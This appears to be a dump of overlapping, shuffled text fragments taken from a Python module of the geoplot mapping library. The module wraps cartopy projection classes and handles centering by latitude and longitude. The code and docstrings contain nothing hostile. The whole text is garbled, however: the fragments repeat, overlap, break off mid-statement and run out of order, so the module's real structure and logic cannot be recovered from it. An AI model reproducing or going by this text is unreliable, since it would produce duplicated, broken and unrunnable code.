AzimuthalEquidistant,\\ LambertConformal,\\ Orthographic,\\ Stereographic,\\ TransverseMercator,\\", "module derives from, refer to http://scitools.org.uk/cartopy/docs/latest/crs/projections.html. \"\"\" import cartopy.crs as", "`centering` restricted to keys in `self.filter_`.\"\"\" def load(self, df, centerings):", "projection contains both ``central_longitude`` and ``central_latitude`` instance parameter, which together", "def load(self, df, centerings): \"\"\"Call `load` method with `centerings` filtered", "`centerings`. \"\"\" def __init__(self, **kwargs): \"\"\"Save parameters that initialize Cartopy", "indeed it is, as this projection is centered on the", "Returns a ``cartopy.crs`` object instance whose appropriate instance variables have", "pass them off to our output ``cartopy.crs`` instance. Returns -------", "LatitudeCentering(Filtering): \"\"\"For a CRS that centers by latitude.\"\"\" filter_ =", "of ``cartopy.crs``.*name* where *name* matches the instance's class name. Parameters", "them. For example, the geospatial projection contains both ``central_longitude`` and", "as gpd class Base: # TODO: RotatedPole \"\"\" Generate instances", "the result of executing ``_as_mpl_axes`` on that object instead. \"\"\"", "returns the result of executing ``_as_mpl_axes`` on that object instead.", "This module defines the ``geoplot`` coordinate reference system classes, wrappers", "of the projection wrapper classes defined here in turn selects", "defaults wherever not already provided by the user. \"\"\" return", "crs : ``cartopy.crs`` object instance Returns a ``cartopy.crs`` object instance", "at the top level. This data is needed to calculate", "the loading and centering of the data occurs automatically (using", "version of its ``cartopy.crs`` mirror, and calls that function's ``_as_mpl_axes``", "reference system object has one. When we pass a ``geoplot.crs``", "this by using ``cartopy.crs`` objects instead, but this is inelegant.", "is a better way: when a ``geoplot.crs`` object called by", "it silently swaps itself out for a vanilla version of", "we gracefully integrate this two-step procedure into the function body.", "execution, we gracefully integrate this two-step procedure into the function", "is inelegant. This method is a better way: when a", "``matplotlib``, it silently swaps itself out for a vanilla version", "of what this method does, exactly, are not important: it", "our output ``cartopy.crs`` instance. Returns ------- crs : ``cartopy.crs`` object", "turn selects the functions from this list relevent to this", "for name in ('PlateCarree', 'LambertCylindrical', 'Mercator', 'Miller', 'Mollweide', 'Robinson', 'Sinusoidal',", "data is needed to calculate reasonable centering variables in cases", "def load(self, df, centerings): \"\"\" A meta-method which abstracts the", "list relevent to this particular instance and passes them to", "**kwargs): \"\"\"Save parameters that initialize Cartopy CRSs.\"\"\" self.args = kwargs", "When we pass a ``geoplot.crs`` crs object to a ``geoplot``", "vanilla version of its ``cartopy.crs`` mirror, and calls that function's", "Parameters ---------- df : GeoDataFrame The GeoDataFrame which has been", "both ``central_longitude`` and ``central_latitude`` instance parameter, which together control the", "one. When we pass a ``geoplot.crs`` crs object to a", "Mercator,\\ Miller,\\ Mollweide,\\ Robinson,\\ Sinusoidal,\\ InterruptedGoodeHomolosine,\\ Geostationary,\\ NorthPolarStereo,\\ SouthPolarStereo =", "`self.filter_`.\"\"\" def load(self, df, centerings): \"\"\"Call `load` method with `centerings`", "centering parameters whilst others lack them. For example, the geospatial", "is provided a projection via a ``projection`` keyword argument, it", "which the user does not already provide them; which is,", "important: it suffices to know that every ``cartopy`` coordinate reference", "\"\"\" return getattr(ccrs, self.__class__.__name__)(**{**centerings, **self.args}) def _as_mpl_axes(self): \"\"\" When ``matplotlib``", "UTM,\\ OSGB,\\ EuroPP,\\ OSNI = tuple( type(name, (Base,), {}) for", "('AlbersEqualArea', 'AzimuthalEquidistant', 'LambertConformal', 'Orthographic', 'Stereographic', 'TransverseMercator', 'LambertAzimuthalEqualArea', 'UTM', 'OSGB', 'EuroPP',", "Stereo projection has only a ``central_longitude`` instance parameter, implying that", "methods. Certain projections have certain centering parameters whilst others lack", "not already provide them; which is, incidentally, the reason behind", "a ``central_longitude`` instance parameter, implying that latitude is fixed (as", "`df` and `centerings`. \"\"\" def __init__(self, **kwargs): \"\"\"Save parameters that", "`centerings` dictionary, overridden by initialization parameters. `_as_mpl_axes` : Return the", "possible to get around this by using ``cartopy.crs`` objects instead,", "function, the loading and centering of the data occurs automatically", "geospatial projection contains both ``central_longitude`` and ``central_latitude`` instance parameter, which", "which is, incidentally, the reason behind all of this funny", "details of what this method does, exactly, are not important:", "self.args = kwargs def load(self, df, centerings): \"\"\" A meta-method", "A dictionary containing names and centering methods. Certain projections have", "system object has one. When we pass a ``geoplot.crs`` crs", "restricted to keys in `self.filter_`.\"\"\" def load(self, df, centerings): \"\"\"Call", "all front-end ``geoplot`` outputs. For the list of Cartopy CRS", "a projection via a ``projection`` keyword argument, it expects to", "our ``df`` and pass them off to our output ``cartopy.crs``", "`self.filter_`.\"\"\" return super().load( df, {key: value for key, value in", "``projection`` parameter of all front-end ``geoplot`` outputs. For the list", "keyword argument, it expects to get something with a callable", "in turn selects the functions from this list relevent to", "integrate this two-step procedure into the function body. But there", "two-step procedure into the function body. But there are also", "``geoplot`` function, the loading and centering of the data occurs", "`_as_mpl_axes` : Return the result of calling cartopy's ``_as_mpl_axes`` for", "object and returns the result of executing ``_as_mpl_axes`` on that", "(LatitudeCentering,), {}) AlbersEqualArea,\\ AzimuthalEquidistant,\\ LambertConformal,\\ Orthographic,\\ Stereographic,\\ TransverseMercator,\\ LambertAzimuthalEqualArea,\\ UTM,\\", "has been passed as input to the plotter at the", "functions to get defaults for our ``df`` and pass them", "without having first called ``load``: most prominently, when creating a", "centerings method is provided in each of the ``geoplot`` top-level", "executing ``_as_mpl_axes`` on that object instead. \"\"\" proj = self.load(gpd.GeoDataFrame(),", "\"\"\" When ``matplotlib`` is provided a projection via a ``projection``", "pre-loaded. It's possible to get around this by using ``cartopy.crs``", "it is, as this projection is centered on the North", "instead. \"\"\" proj = self.load(gpd.GeoDataFrame(), dict()) return proj._as_mpl_axes() class Filtering(Base):", "CRS that centers by longitude.\"\"\" filter_ = {'central_longitude'} class LatitudeCentering(Filtering):", "{}) for name in ('PlateCarree', 'LambertCylindrical', 'Mercator', 'Miller', 'Mollweide', 'Robinson',", "Robinson,\\ Sinusoidal,\\ InterruptedGoodeHomolosine,\\ Geostationary,\\ NorthPolarStereo,\\ SouthPolarStereo = tuple( type(name, (LongitudeCentering,),", "execute these functions to get defaults for our ``df`` and", "top-level centerings method is provided in each of the ``geoplot``", "this is inelegant. This method is a better way: when", "initialized with defaults from the `centerings` dictionary, overridden by initialization", "been set to reasonable defaults wherever not already provided by", "is centered on the North Pole!). A top-level centerings method", "a ``geoplot.crs`` crs object to a ``geoplot`` function, the loading", "as input to the plotter at the top level. This", "coordinate reference system object has one. When we pass a", "Filtering(Base): \"\"\"CRS that `load`s with `centering` restricted to keys in", "by longitude.\"\"\" filter_ = {'central_longitude'} class LatitudeCentering(Filtering): \"\"\"For a CRS", "= {'central_longitude'} class LatitudeCentering(Filtering): \"\"\"For a CRS that centers by", "``geoplot`` does at execution, we gracefully integrate this two-step procedure", "cases outside of our control in which we are forced", "wrapper classes defined here in turn selects the functions from", "``geoplot.crs`` object without having first called ``load``: most prominently, when", "instead. Parameters ---------- proj : geoplot.crs projection instance The instance", "Orthographic,\\ Stereographic,\\ TransverseMercator,\\ LambertAzimuthalEqualArea,\\ UTM,\\ OSGB,\\ EuroPP,\\ OSNI = tuple(", "and pass them off to our output ``cartopy.crs`` instance. Returns", ": ``cartopy.crs`` object instance Returns a ``cartopy.crs`` object instance whose", "getattr(ccrs, self.__class__.__name__)(**{**centerings, **self.args}) def _as_mpl_axes(self): \"\"\" When ``matplotlib`` is provided", "GeoDataFrame The GeoDataFrame which has been passed as input to", "pass a ``geoplot.crs`` crs object to a ``geoplot`` function, the", "most prominently, when creating a plot containing subplots, the \"overall\"", "body). Returns ------- Mutates into a ``cartopy.crs`` object and returns", "cartopy.crs as ccrs import geopandas as gpd class Base: #", "that object instead. \"\"\" proj = self.load(gpd.GeoDataFrame(), dict()) return proj._as_mpl_axes()", "projection is centered on the North Pole!). A top-level centerings", "derives from, refer to http://scitools.org.uk/cartopy/docs/latest/crs/projections.html. \"\"\" import cartopy.crs as ccrs", "data occurs automatically (using the function defined immediately above). Since", "question (self, in the method body). Returns ------- Mutates into", "``_generic_load`` method here. We then in turn execute these functions", "``df`` and pass them off to our output ``cartopy.crs`` instance.", "object instance whose appropriate instance variables have been set to", "something with a callable ``as_mpl_axes`` method. The precise details of", "the North Pole Stereo projection has only a ``central_longitude`` instance", "to the ``projection`` parameter of all front-end ``geoplot`` outputs. For", "a ``projection`` keyword argument, it expects to get something with", ": Return the result of calling cartopy's ``_as_mpl_axes`` for `self.load`", "------- crs : ``cartopy.crs`` object instance Returns a ``cartopy.crs`` object", "method body). Returns ------- Mutates into a ``cartopy.crs`` object and", "``cartopy.crs`` instance. Returns ------- crs : ``cartopy.crs`` object instance Returns", "we pass a ``geoplot.crs`` crs object to a ``geoplot`` function,", "Mollweide,\\ Robinson,\\ Sinusoidal,\\ InterruptedGoodeHomolosine,\\ Geostationary,\\ NorthPolarStereo,\\ SouthPolarStereo = tuple( type(name,", "`self.load` called with empty `df` and `centerings`. \"\"\" def __init__(self,", "the ``projection`` parameter of all front-end ``geoplot`` outputs. For the", "kwargs def load(self, df, centerings): \"\"\" A meta-method which abstracts", "object instead. \"\"\" proj = self.load(gpd.GeoDataFrame(), dict()) return proj._as_mpl_axes() class", "class LongitudeCentering(Filtering): \"\"\"Form a CRS that centers by longitude.\"\"\" filter_", "body. But there are also use cases outside of our", "on that object instead. \"\"\" proj = self.load(gpd.GeoDataFrame(), dict()) return", "in centerings.items() if key in self.filter_} ) class LongitudeCentering(Filtering): \"\"\"Form", "internals of individual projections' load procedures. Parameters ---------- df :", "the functions from this list relevent to this particular instance", "centering methods. Certain projections have certain centering parameters whilst others", "particular instance and passes them to the ``_generic_load`` method here.", "in each of the ``geoplot`` top-level plot functions; each of", "\"\"\" proj = self.load(gpd.GeoDataFrame(), dict()) return proj._as_mpl_axes() class Filtering(Base): \"\"\"CRS", "immediately above). Since we control what ``geoplot`` does at execution,", "---------- proj : geoplot.crs projection instance The instance in question", "self.filter_} ) class LongitudeCentering(Filtering): \"\"\"Form a CRS that centers by", "type(name, (Base,), {}) for name in ('AlbersEqualArea', 'AzimuthalEquidistant', 'LambertConformal', 'Orthographic',", "to get defaults for our ``df`` and pass them off", "filtered to keys in `self.filter_`.\"\"\" return super().load( df, {key: value", "them; which is, incidentally, the reason behind all of this", "to keys in `self.filter_`.\"\"\" def load(self, df, centerings): \"\"\"Call `load`", "has only a ``central_longitude`` instance parameter, implying that latitude is", "implying that latitude is fixed (as indeed it is, as", "that latitude is fixed (as indeed it is, as this", "what ``geoplot`` does at execution, we gracefully integrate this two-step", "defaults for our ``df`` and pass them off to our", "instance in question (self, in the method body). Returns -------", "functions; each of the projection wrapper classes defined here in", "that every ``cartopy`` coordinate reference system object has one. When", "of Cartopy CRS objects this module derives from, refer to", "be used as parameters to the ``projection`` parameter of all", "must be pre-loaded. It's possible to get around this by", "silently swaps itself out for a vanilla version of its", "Returns ------- Mutates into a ``cartopy.crs`` object and returns the", "proj : geoplot.crs projection instance The instance in question (self,", "to a ``geoplot`` function, the loading and centering of the", "a callable ``as_mpl_axes`` method. The precise details of what this", "the reason behind all of this funny twice-instantiation loading in", "we control what ``geoplot`` does at execution, we gracefully integrate", "calculate reasonable centering variables in cases in which the user", "{}) for name in ('AlbersEqualArea', 'AzimuthalEquidistant', 'LambertConformal', 'Orthographic', 'Stereographic', 'TransverseMercator',", "it expects to get something with a callable ``as_mpl_axes`` method.", "``cartopy.crs`` objects meant to be used as parameters to the", "longitude.\"\"\" filter_ = {'central_longitude'} class LatitudeCentering(Filtering): \"\"\"For a CRS that", "`load` : Return a Cartopy CRS initialized with defaults from", "latitude.\"\"\" filter_ = {'central_latitude'} PlateCarree,\\ LambertCylindrical,\\ Mercator,\\ Miller,\\ Mollweide,\\ Robinson,\\", "`load` method with `centerings` filtered to keys in `self.filter_`.\"\"\" return", "user. \"\"\" return getattr(ccrs, self.__class__.__name__)(**{**centerings, **self.args}) def _as_mpl_axes(self): \"\"\" When", "others lack them. For example, the geospatial projection contains both", "defines the ``geoplot`` coordinate reference system classes, wrappers on ``cartopy.crs``", "method with `centerings` filtered to keys in `self.filter_`.\"\"\" return super().load(", "at execution, we gracefully integrate this two-step procedure into the", "the internals of individual projections' load procedures. Parameters ---------- df", "incidentally, the reason behind all of this funny twice-instantiation loading", "the function body. But there are also use cases outside", "North Pole!). A top-level centerings method is provided in each", "Stereographic,\\ TransverseMercator,\\ LambertAzimuthalEqualArea,\\ UTM,\\ OSGB,\\ EuroPP,\\ OSNI = tuple( type(name,", "defined immediately above). Since we control what ``geoplot`` does at", "only a ``central_longitude`` instance parameter, implying that latitude is fixed", ": Return a Cartopy CRS initialized with defaults from the", "For example, the geospatial projection contains both ``central_longitude`` and ``central_latitude``", "LambertConformal,\\ Orthographic,\\ Stereographic,\\ TransverseMercator,\\ LambertAzimuthalEqualArea,\\ UTM,\\ OSGB,\\ EuroPP,\\ OSNI =", "projections have certain centering parameters whilst others lack them. For", "Parameters ---------- `load` : Return a Cartopy CRS initialized with", "``_as_mpl_axes`` on that object instead. \"\"\" proj = self.load(gpd.GeoDataFrame(), dict())", "the `centerings` dictionary, overridden by initialization parameters. `_as_mpl_axes` : Return", "user does not already provide them; which is, incidentally, the", "wherever not already provided by the user. \"\"\" return getattr(ccrs,", "loading in the first place. centerings: dict A dictionary containing", "but this is inelegant. This method is a better way:", "this two-step procedure into the function body. But there are", "with `centerings` filtered to keys in `self.filter_`.\"\"\" return super().load( df,", "_as_mpl_axes(self): \"\"\" When ``matplotlib`` is provided a projection via a", "argument, it expects to get something with a callable ``as_mpl_axes``", "object instance Returns a ``cartopy.crs`` object instance whose appropriate instance", "\"overall\" projection must be pre-loaded. It's possible to get around", "``cartopy.crs`` object and returns the result of executing ``_as_mpl_axes`` on", "OSGB,\\ EuroPP,\\ OSNI = tuple( type(name, (Base,), {}) for name", "out for a vanilla version of its ``cartopy.crs`` mirror, and", "For the list of Cartopy CRS objects this module derives", "dictionary, overridden by initialization parameters. `_as_mpl_axes` : Return the result", "method here. We then in turn execute these functions to", "which together control the center of the plot, while the", "geoplot.crs projection instance The instance in question (self, in the", "crs object to a ``geoplot`` function, the loading and centering", "We then in turn execute these functions to get defaults", "is fixed (as indeed it is, as this projection is", "type(name, (LongitudeCentering,), {}) for name in ('PlateCarree', 'LambertCylindrical', 'Mercator', 'Miller',", "example, the geospatial projection contains both ``central_longitude`` and ``central_latitude`` instance", "the method body). Returns ------- Mutates into a ``cartopy.crs`` object", "= tuple( type(name, (LongitudeCentering,), {}) for name in ('PlateCarree', 'LambertCylindrical',", "defaults from the `centerings` dictionary, overridden by initialization parameters. `_as_mpl_axes`", "to the ``_generic_load`` method here. We then in turn execute", "with a callable ``as_mpl_axes`` method. The precise details of what", "keys in `self.filter_`.\"\"\" def load(self, df, centerings): \"\"\"Call `load` method", "objects meant to be used as parameters to the ``projection``", "'AzimuthalEquidistant', 'LambertConformal', 'Orthographic', 'Stereographic', 'TransverseMercator', 'LambertAzimuthalEqualArea', 'UTM', 'OSGB', 'EuroPP', 'OSNI')", "\"\"\"CRS that `load`s with `centering` restricted to keys in `self.filter_`.\"\"\"", "it suffices to know that every ``cartopy`` coordinate reference system", "North Pole Stereo projection has only a ``central_longitude`` instance parameter,", "control the center of the plot, while the North Pole", "way: when a ``geoplot.crs`` object called by ``matplotlib``, it silently", "PlateCarree,\\ LambertCylindrical,\\ Mercator,\\ Miller,\\ Mollweide,\\ Robinson,\\ Sinusoidal,\\ InterruptedGoodeHomolosine,\\ Geostationary,\\ NorthPolarStereo,\\", "initialization parameters. `_as_mpl_axes` : Return the result of calling cartopy's", "by ``matplotlib``, it silently swaps itself out for a vanilla", "result of executing ``_as_mpl_axes`` on that object instead. \"\"\" proj", "return proj._as_mpl_axes() class Filtering(Base): \"\"\"CRS that `load`s with `centering` restricted", "NorthPolarStereo,\\ SouthPolarStereo = tuple( type(name, (LongitudeCentering,), {}) for name in", "dictionary containing names and centering methods. Certain projections have certain", "The precise details of what this method does, exactly, are", "load procedures. Parameters ---------- df : GeoDataFrame The GeoDataFrame which", "creating a plot containing subplots, the \"overall\" projection must be", "classes, wrappers on ``cartopy.crs`` objects meant to be used as", "value for key, value in centerings.items() if key in self.filter_}", "'Mercator', 'Miller', 'Mollweide', 'Robinson', 'Sinusoidal', 'InterruptedGoodeHomolosine', 'Geostationary', 'NorthPolarStereo', 'SouthPolarStereo') )", "inelegant. This method is a better way: when a ``geoplot.crs``", "the center of the plot, while the North Pole Stereo", "of the ``geoplot`` top-level plot functions; each of the projection", "parameter of all front-end ``geoplot`` outputs. For the list of", "containing names and centering methods. Certain projections have certain centering", "a better way: when a ``geoplot.crs`` object called by ``matplotlib``,", "each of the ``geoplot`` top-level plot functions; each of the", "method. The precise details of what this method does, exactly,", "ccrs import geopandas as gpd class Base: # TODO: RotatedPole", "LambertCylindrical,\\ Mercator,\\ Miller,\\ Mollweide,\\ Robinson,\\ Sinusoidal,\\ InterruptedGoodeHomolosine,\\ Geostationary,\\ NorthPolarStereo,\\ SouthPolarStereo", "'LambertConformal', 'Orthographic', 'Stereographic', 'TransverseMercator', 'LambertAzimuthalEqualArea', 'UTM', 'OSGB', 'EuroPP', 'OSNI') )", "this projection is centered on the North Pole!). A top-level", "import cartopy.crs as ccrs import geopandas as gpd class Base:", "subplots, the \"overall\" projection must be pre-loaded. It's possible to", "The instance in question (self, in the method body). Returns", "A top-level centerings method is provided in each of the", "df, centerings): \"\"\"Call `load` method with `centerings` filtered to keys", "centerings.items() if key in self.filter_} ) class LongitudeCentering(Filtering): \"\"\"Form a", "proj._as_mpl_axes() class Filtering(Base): \"\"\"CRS that `load`s with `centering` restricted to", "\"\"\" import cartopy.crs as ccrs import geopandas as gpd class", "function defined immediately above). Since we control what ``geoplot`` does", "``load``: most prominently, when creating a plot containing subplots, the", "'SouthPolarStereo') ) Gnomonic = type('Gnomonic', (LatitudeCentering,), {}) AlbersEqualArea,\\ AzimuthalEquidistant,\\ LambertConformal,\\", "return getattr(ccrs, self.__class__.__name__)(**{**centerings, **self.args}) def _as_mpl_axes(self): \"\"\" When ``matplotlib`` is", "reasonable centering variables in cases in which the user does", "key in self.filter_} ) class LongitudeCentering(Filtering): \"\"\"Form a CRS that", "initialize Cartopy CRSs.\"\"\" self.args = kwargs def load(self, df, centerings):", "relevent to this particular instance and passes them to the", "output ``cartopy.crs`` instance. Returns ------- crs : ``cartopy.crs`` object instance", "been passed as input to the plotter at the top", "\"\"\" This module defines the ``geoplot`` coordinate reference system classes,", "Since we control what ``geoplot`` does at execution, we gracefully", "name. Parameters ---------- `load` : Return a Cartopy CRS initialized", "the ``geoplot`` coordinate reference system classes, wrappers on ``cartopy.crs`` objects", "OSNI = tuple( type(name, (Base,), {}) for name in ('AlbersEqualArea',", "Base: # TODO: RotatedPole \"\"\" Generate instances of ``cartopy.crs``.*name* where", "by latitude.\"\"\" filter_ = {'central_latitude'} PlateCarree,\\ LambertCylindrical,\\ Mercator,\\ Miller,\\ Mollweide,\\", "reason behind all of this funny twice-instantiation loading in the", "Cartopy CRSs.\"\"\" self.args = kwargs def load(self, df, centerings): \"\"\"", "\"\"\"For a CRS that centers by latitude.\"\"\" filter_ = {'central_latitude'}", "CRS that centers by latitude.\"\"\" filter_ = {'central_latitude'} PlateCarree,\\ LambertCylindrical,\\", "in ('PlateCarree', 'LambertCylindrical', 'Mercator', 'Miller', 'Mollweide', 'Robinson', 'Sinusoidal', 'InterruptedGoodeHomolosine', 'Geostationary',", "This data is needed to calculate reasonable centering variables in", "to get something with a callable ``as_mpl_axes`` method. The precise", "plot containing subplots, the \"overall\" projection must be pre-loaded. It's", "this method does, exactly, are not important: it suffices to", "are not important: it suffices to know that every ``cartopy``", "``cartopy`` coordinate reference system object has one. When we pass", "`load`s with `centering` restricted to keys in `self.filter_`.\"\"\" def load(self,", "and centering methods. Certain projections have certain centering parameters whilst", "'LambertCylindrical', 'Mercator', 'Miller', 'Mollweide', 'Robinson', 'Sinusoidal', 'InterruptedGoodeHomolosine', 'Geostationary', 'NorthPolarStereo', 'SouthPolarStereo')", "key, value in centerings.items() if key in self.filter_} ) class", "off to our output ``cartopy.crs`` instance. Returns ------- crs :", "dict()) return proj._as_mpl_axes() class Filtering(Base): \"\"\"CRS that `load`s with `centering`", "in `self.filter_`.\"\"\" def load(self, df, centerings): \"\"\"Call `load` method with", "appropriate instance variables have been set to reasonable defaults wherever", "Generate instances of ``cartopy.crs``.*name* where *name* matches the instance's class", "GeoDataFrame which has been passed as input to the plotter", "keys in `self.filter_`.\"\"\" return super().load( df, {key: value for key,", "in `self.filter_`.\"\"\" return super().load( df, {key: value for key, value", "which we are forced to pass a ``geoplot.crs`` object without", "a ``cartopy.crs`` object and returns the result of executing ``_as_mpl_axes``", "centers by longitude.\"\"\" filter_ = {'central_longitude'} class LatitudeCentering(Filtering): \"\"\"For a", "have certain centering parameters whilst others lack them. For example,", "Mutates into a ``cartopy.crs`` object and returns the result of", "a vanilla version of its ``cartopy.crs`` mirror, and calls that", "from the `centerings` dictionary, overridden by initialization parameters. `_as_mpl_axes` :", "object called by ``matplotlib``, it silently swaps itself out for", "by initialization parameters. `_as_mpl_axes` : Return the result of calling", "outside of our control in which we are forced to", "------- Mutates into a ``cartopy.crs`` object and returns the result", "the plotter at the top level. This data is needed", "objects instead, but this is inelegant. This method is a", "type('Gnomonic', (LatitudeCentering,), {}) AlbersEqualArea,\\ AzimuthalEquidistant,\\ LambertConformal,\\ Orthographic,\\ Stereographic,\\ TransverseMercator,\\ LambertAzimuthalEqualArea,\\", "these functions to get defaults for our ``df`` and pass", "Cartopy CRS initialized with defaults from the `centerings` dictionary, overridden", "into the function body. But there are also use cases", "parameters whilst others lack them. For example, the geospatial projection", "in the method body). Returns ------- Mutates into a ``cartopy.crs``", "``central_latitude`` instance parameter, which together control the center of the", "reasonable defaults wherever not already provided by the user. \"\"\"", "meant to be used as parameters to the ``projection`` parameter", "the instance's class name. Parameters ---------- `load` : Return a", "instance and passes them to the ``_generic_load`` method here. We", "by the user. \"\"\" return getattr(ccrs, self.__class__.__name__)(**{**centerings, **self.args}) def _as_mpl_axes(self):", "projection must be pre-loaded. It's possible to get around this", "for name in ('AlbersEqualArea', 'AzimuthalEquidistant', 'LambertConformal', 'Orthographic', 'Stereographic', 'TransverseMercator', 'LambertAzimuthalEqualArea',", "system classes, wrappers on ``cartopy.crs`` objects meant to be used", "load(self, df, centerings): \"\"\" A meta-method which abstracts the internals", "instances of ``cartopy.crs``.*name* where *name* matches the instance's class name.", "get something with a callable ``as_mpl_axes`` method. The precise details", "already provide them; which is, incidentally, the reason behind all", "has one. When we pass a ``geoplot.crs`` crs object to", "filter_ = {'central_latitude'} PlateCarree,\\ LambertCylindrical,\\ Mercator,\\ Miller,\\ Mollweide,\\ Robinson,\\ Sinusoidal,\\", "provide them; which is, incidentally, the reason behind all of", ") Gnomonic = type('Gnomonic', (LatitudeCentering,), {}) AlbersEqualArea,\\ AzimuthalEquidistant,\\ LambertConformal,\\ Orthographic,\\", "calls that function's ``_as_mpl_axes`` instead. Parameters ---------- proj : geoplot.crs", "forced to pass a ``geoplot.crs`` object without having first called", "overridden by initialization parameters. `_as_mpl_axes` : Return the result of", "= kwargs def load(self, df, centerings): \"\"\" A meta-method which", "this particular instance and passes them to the ``_generic_load`` method", "a Cartopy CRS initialized with defaults from the `centerings` dictionary,", "dict A dictionary containing names and centering methods. Certain projections", "= self.load(gpd.GeoDataFrame(), dict()) return proj._as_mpl_axes() class Filtering(Base): \"\"\"CRS that `load`s", "``central_longitude`` instance parameter, implying that latitude is fixed (as indeed", "in question (self, in the method body). Returns ------- Mutates", "instance variables have been set to reasonable defaults wherever not", "to the plotter at the top level. This data is", "front-end ``geoplot`` outputs. For the list of Cartopy CRS objects", "together control the center of the plot, while the North", "this funny twice-instantiation loading in the first place. centerings: dict", "to this particular instance and passes them to the ``_generic_load``", "Returns ------- crs : ``cartopy.crs`` object instance Returns a ``cartopy.crs``", "When ``matplotlib`` is provided a projection via a ``projection`` keyword", "of its ``cartopy.crs`` mirror, and calls that function's ``_as_mpl_axes`` instead.", "LongitudeCentering(Filtering): \"\"\"Form a CRS that centers by longitude.\"\"\" filter_ =", "---------- df : GeoDataFrame The GeoDataFrame which has been passed", "A meta-method which abstracts the internals of individual projections' load", "of the plot, while the North Pole Stereo projection has", "of calling cartopy's ``_as_mpl_axes`` for `self.load` called with empty `df`", "as ccrs import geopandas as gpd class Base: # TODO:", "(as indeed it is, as this projection is centered on", ": GeoDataFrame The GeoDataFrame which has been passed as input", "self.load(gpd.GeoDataFrame(), dict()) return proj._as_mpl_axes() class Filtering(Base): \"\"\"CRS that `load`s with", "the geospatial projection contains both ``central_longitude`` and ``central_latitude`` instance parameter,", "instead, but this is inelegant. This method is a better", "# TODO: RotatedPole \"\"\" Generate instances of ``cartopy.crs``.*name* where *name*", "the list of Cartopy CRS objects this module derives from,", "in the first place. centerings: dict A dictionary containing names", "But there are also use cases outside of our control", "have been set to reasonable defaults wherever not already provided", "from, refer to http://scitools.org.uk/cartopy/docs/latest/crs/projections.html. \"\"\" import cartopy.crs as ccrs import", "gracefully integrate this two-step procedure into the function body. But", "plot functions; each of the projection wrapper classes defined here", "this module derives from, refer to http://scitools.org.uk/cartopy/docs/latest/crs/projections.html. \"\"\" import cartopy.crs", "instance The instance in question (self, in the method body).", "is needed to calculate reasonable centering variables in cases in", "df, centerings): \"\"\" A meta-method which abstracts the internals of", "is, incidentally, the reason behind all of this funny twice-instantiation", "a CRS that centers by longitude.\"\"\" filter_ = {'central_longitude'} class", "parameters. `_as_mpl_axes` : Return the result of calling cartopy's ``_as_mpl_axes``", "SouthPolarStereo = tuple( type(name, (LongitudeCentering,), {}) for name in ('PlateCarree',", "centerings): \"\"\"Call `load` method with `centerings` filtered to keys in", "= {'central_latitude'} PlateCarree,\\ LambertCylindrical,\\ Mercator,\\ Miller,\\ Mollweide,\\ Robinson,\\ Sinusoidal,\\ InterruptedGoodeHomolosine,\\", "RotatedPole \"\"\" Generate instances of ``cartopy.crs``.*name* where *name* matches the", "already provided by the user. \"\"\" return getattr(ccrs, self.__class__.__name__)(**{**centerings, **self.args})", "them off to our output ``cartopy.crs`` instance. Returns ------- crs", "def __init__(self, **kwargs): \"\"\"Save parameters that initialize Cartopy CRSs.\"\"\" self.args", "that centers by longitude.\"\"\" filter_ = {'central_longitude'} class LatitudeCentering(Filtering): \"\"\"For", "needed to calculate reasonable centering variables in cases in which", "CRSs.\"\"\" self.args = kwargs def load(self, df, centerings): \"\"\" A", "procedure into the function body. But there are also use", "\"\"\"Form a CRS that centers by longitude.\"\"\" filter_ = {'central_longitude'}", "'Geostationary', 'NorthPolarStereo', 'SouthPolarStereo') ) Gnomonic = type('Gnomonic', (LatitudeCentering,), {}) AlbersEqualArea,\\", "``central_longitude`` and ``central_latitude`` instance parameter, which together control the center", "are forced to pass a ``geoplot.crs`` object without having first", "by using ``cartopy.crs`` objects instead, but this is inelegant. This", "InterruptedGoodeHomolosine,\\ Geostationary,\\ NorthPolarStereo,\\ SouthPolarStereo = tuple( type(name, (LongitudeCentering,), {}) for", "callable ``as_mpl_axes`` method. The precise details of what this method", "df : GeoDataFrame The GeoDataFrame which has been passed as", "loading and centering of the data occurs automatically (using the", "matches the instance's class name. Parameters ---------- `load` : Return", "``cartopy.crs`` object instance whose appropriate instance variables have been set", "class Filtering(Base): \"\"\"CRS that `load`s with `centering` restricted to keys", "lack them. For example, the geospatial projection contains both ``central_longitude``", "\"\"\" def __init__(self, **kwargs): \"\"\"Save parameters that initialize Cartopy CRSs.\"\"\"", "this list relevent to this particular instance and passes them", "the ``_generic_load`` method here. We then in turn execute these", "first called ``load``: most prominently, when creating a plot containing", "all of this funny twice-instantiation loading in the first place.", "calling cartopy's ``_as_mpl_axes`` for `self.load` called with empty `df` and", "instance Returns a ``cartopy.crs`` object instance whose appropriate instance variables", "``matplotlib`` is provided a projection via a ``projection`` keyword argument,", "funny twice-instantiation loading in the first place. centerings: dict A", "to keys in `self.filter_`.\"\"\" return super().load( df, {key: value for", "super().load( df, {key: value for key, value in centerings.items() if", "its ``cartopy.crs`` mirror, and calls that function's ``_as_mpl_axes`` instead. Parameters", "CRS initialized with defaults from the `centerings` dictionary, overridden by", "the data occurs automatically (using the function defined immediately above).", "'InterruptedGoodeHomolosine', 'Geostationary', 'NorthPolarStereo', 'SouthPolarStereo') ) Gnomonic = type('Gnomonic', (LatitudeCentering,), {})", "and calls that function's ``_as_mpl_axes`` instead. Parameters ---------- proj :", "the ``geoplot`` top-level plot functions; each of the projection wrapper", "class Base: # TODO: RotatedPole \"\"\" Generate instances of ``cartopy.crs``.*name*", "instance whose appropriate instance variables have been set to reasonable", "in ('AlbersEqualArea', 'AzimuthalEquidistant', 'LambertConformal', 'Orthographic', 'Stereographic', 'TransverseMercator', 'LambertAzimuthalEqualArea', 'UTM', 'OSGB',", "module defines the ``geoplot`` coordinate reference system classes, wrappers on", "level. This data is needed to calculate reasonable centering variables", "the function defined immediately above). Since we control what ``geoplot``", "exactly, are not important: it suffices to know that every", "latitude is fixed (as indeed it is, as this projection", "centering of the data occurs automatically (using the function defined", "value in centerings.items() if key in self.filter_} ) class LongitudeCentering(Filtering):", "Sinusoidal,\\ InterruptedGoodeHomolosine,\\ Geostationary,\\ NorthPolarStereo,\\ SouthPolarStereo = tuple( type(name, (LongitudeCentering,), {})", "parameters to the ``projection`` parameter of all front-end ``geoplot`` outputs.", "method does, exactly, are not important: it suffices to know", "into a ``cartopy.crs`` object and returns the result of executing", "to get around this by using ``cartopy.crs`` objects instead, but", "with `centering` restricted to keys in `self.filter_`.\"\"\" def load(self, df,", "which has been passed as input to the plotter at", "``as_mpl_axes`` method. The precise details of what this method does,", "(Base,), {}) 